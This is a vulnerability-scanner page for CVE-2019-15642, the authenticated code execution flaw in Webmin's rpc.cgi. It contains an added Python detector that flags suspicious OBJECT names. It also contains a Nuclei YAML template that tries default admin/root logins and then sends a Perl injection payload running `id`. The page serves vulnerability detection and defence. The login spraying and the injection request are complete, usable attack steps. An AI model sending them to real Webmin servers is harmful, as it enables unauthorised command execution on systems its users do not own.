Webmin < 1.920 - Authenticated Remote Code Execution
ID: CVE-2019-15642
Severity: high
Author: pussycat0x
Tags: cve,cve2019,webmin,rce
Description
rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states “RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.”
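The weakness above is that the object name handed to rpc.cgi's OBJECT command reaches an eval without being constrained to a plain Perl package name, so anything after the name (a `;` followed by Perl code, as in the template's payload) is executed. The following added example, written for this page and not taken from Webmin or the Nuclei project, shows the defender-side check that follows from that: it inspects rpc.cgi request bodies (for example from a WAF hook or a proxy capture) and flags any OBJECT line whose name is not a bare package identifier. The package-name pattern and the sample bodies are assumptions constructed for the example; only the last sample reproduces the shape of the payload shown in the template.

```python
"""Flag rpc.cgi OBJECT requests whose object name is not a plain Perl package
name. Added defender-side example for CVE-2019-15642; not Webmin's own code."""
import re

# Assumption (not from the page): a legitimate OBJECT name is a Perl package
# name such as "Socket" or "Net::SSLeay::Handle" and nothing else.
PACKAGE_NAME = re.compile(r"^[A-Za-z_]\w*(?:::\w+)*$")

# Constructed sample request bodies (not captured from a real system).
# The last one mirrors the template's payload: the name is followed by ';'
# and Perl code, which is exactly what should never reach an eval.
SAMPLE_RPC_BODIES = [
    "OBJECT Socket",
    "OBJECT Net::SSLeay::Handle",
    "CALL some_function",  # constructed non-OBJECT line, passed through
    'OBJECT Socket;print "Content-Type: text/plain\\n\\n";$cmd=`id`;print "$cmd\\n\\n";',
]


def classify_rpc_body(body: str) -> str:
    """Return 'ok', 'suspicious' or 'not-object' for one rpc.cgi body.

    Only the first line is examined, since that is where the OBJECT
    command and its object name appear in the template's request.
    """
    first_line = body.splitlines()[0] if body else ""
    match = re.match(r"^OBJECT\s+(.*)$", first_line)
    if not match:
        return "not-object"
    name = match.group(1).strip()
    # A bare package name is fine; any other character (';', quotes,
    # backticks, '$') means code is riding along with the name.
    return "ok" if PACKAGE_NAME.match(name) else "suspicious"


def scan_rpc_bodies(bodies):
    """Pair every body with its verdict so suspicious ones can be reviewed."""
    return [(body, classify_rpc_body(body)) for body in bodies]


def suspicious_count(bodies) -> int:
    """Number of bodies that would be blocked or alerted on."""
    return sum(1 for _, verdict in scan_rpc_bodies(bodies) if verdict == "suspicious")


if __name__ == "__main__":
    for body, verdict in scan_rpc_bodies(SAMPLE_RPC_BODIES):
        print(f"{verdict:10s} {body[:60]}")
```

Because the template logs in first, the check only matters for traffic from authenticated sessions; alerting on a "suspicious" verdict from an account that should not have RPC access at all is the more useful signal, in line with the documentation note quoted above.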
YAML Source
```yaml
id: CVE-2019-15642

info:
  name: Webmin < 1.920 - Authenticated Remote Code Execution
  author: pussycat0x
  severity: high
  description: |
    rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states "RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users."
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Webmin to version 1.920 or later to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2019-15642
    - https://github.com/jas502n/CVE-2019-15642
    - https://doxfer.webmin.com/Webmin/Webmin_Servers_Index
    - https://github.com/webmin/webmin/blob/ab5e00e41ea1ecc1e24b8f8693f3495a0abb1aed/rpc.cgi#L26-L37
    - https://github.com/webmin/webmin/commit/df8a43fb4bdc9c858874f72773bcba597ae9432c
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-15642
    cwe-id: CWE-94
    epss-score: 0.22278
    epss-percentile: 0.9605
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: webmin
    product: webmin
    shodan-query:
      - title:"Webmin"
      - http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2019,webmin,rce

variables:
  cmd: '`id`'

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Cookie: redirect=1; testing=1
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}
        Accept-Encoding: gzip, deflate

        user={{username}}&pass={{password}}

      - |
        POST /rpc.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Referer: {{RootURL}}/sysinfo.cgi?xnavigation=1
        Accept-Encoding: gzip, deflate

        OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd={{cmd}};print "$cmd\n\n";

    attack: pitchfork
    payloads:
      username:
        - admin
        - root
      password:
        - admin
        - root
    stop-at-first-match: true
    host-redirects: true

    matchers-condition: and
    matchers:
      - type: regex
        part: body_2
        regex:
          - 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=(\d+)\(.*?\)'

      - type: word
        part: body_2
        words:
          - "Content-type: text/plain"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022066f8876c77efd0bf866f45455cb92a99e475a66b4f07adc82f752189e6e768f2022100b57db0c19142b27c6311f0825cc2dbbb5f44269f669bd109b14f59d0c445603c:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-15642.yaml"